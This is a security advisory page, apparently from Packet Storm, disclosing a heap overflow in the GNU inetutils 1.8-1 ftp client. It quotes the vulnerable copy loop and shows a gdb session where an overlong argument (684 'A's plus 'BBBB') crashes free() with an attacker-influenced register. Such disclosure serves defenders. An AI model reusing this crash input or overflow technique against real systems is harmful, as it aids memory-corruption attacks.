what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GNU inetutils 1.8-1 FTP Client Heap Overflow

GNU inetutils 1.8-1 FTP Client Heap Overflow
Posted Dec 7, 2010
Authored by Rew

GNU inetutils version 18-1 suffers from a ftp client heap overflow vulnerability.

tags | exploit, overflow
SHA-256 | 282da6696173d8cd3739def58f4cfdc260a9fe4ac9634077887519e75c3b4e34

GNU inetutils 1.8-1 FTP Client Heap Overflow

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title: GNU inetutils 1.8-1 ftp client Heap Overflow
Date: Dec 07 2010
Author: Rew
Software Link: http://ftp.gnu.org/gnu/inetutils/inetutils-1.8.tar.gz
Version: 1.8-1
Tested on: Arch Linux (up to date)
CVE: NA (0day)

===========================================================================

Here's a cute little bug just for kicks. This is only triggerable by
the local user, so exploitation would get you absolutely nowhere, but
meh :P

GNU inetutils ftp (shipped with linux and other *nix's) suffers a heap
overflow while parsing command arguments (but ONLY when the argument is
NOT passed on the same line.) If you run any command (open, user, cd,
mkdir, etc) without an argument, ftp will prompt you for an argument
with readline(). It will then copy this input into a 200 byte buffer
without first checking it's length. NOTE: Some distros might modify
this binary. It didn't seem to work on the default Mint ftp client
(maybe a Ubuntu thing?) but the default Arch binary is vulnerable. Your
results may vary. Download from GNU if you have doubts.

- --- ftp/main.c:slurpstring() ---

406: char *sb = stringbase; <--- This is our input. (can be massive)
407: char *ap = argbase; <--- This buffer is 200 bytes.

458: S1:

463: case '\0':
464: goto OUT;

474: default:
475: *ap++ = *sb++; <--- Heap overflow
476: got_one = 1;
477: goto S1;
478: }

- --------------------------------

backtrace at overflow:
main()->cmdscanner()->cd()->another()->makeargv()->slurpstring()

The segfault below occurs later, when free() is called on an overwritten
pointer @ 684 bytes.

===========================================================================

rew@WOPR ~ $ pacman -Q inetutils
inetutils 1.8-1

rew@WOPR ~ $ gdb ftp
GNU gdb (GDB) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
Reading symbols from /usr/bin/ftp...(no debugging symbols found)...done.

(gdb) run
Starting program: /usr/bin/ftp
ftp> open
(to) AAAAAAAA ... [x684] ... AAAAAAAABBBB
usage: open host-name [port]

Program received signal SIGSEGV, Segmentation fault.
0xb7eb8dc1 in free () from /lib/libc.so.6
(gdb) i r
eax 0x0 0
ecx 0x1 1
edx 0x42424239 1111638329
ebx 0xb7f8fff4 -1208418316
esp 0xbffff818 0xbffff818
ebp 0xbffff828 0xbffff828
esi 0x8064518 134628632
edi 0x8064be0 134630368
eip 0xb7eb8dc1 0xb7eb8dc1 <free+49>
eflags 0x210216 [ PF AF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkz+xCwACgkQy2WYMxSouUxJgACePkKDrYlTuj0UaU6s0NmjVWKZ
uBQAoJXka83R8QvgzmEj0yF0B9Eni40Y
=SUzV
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close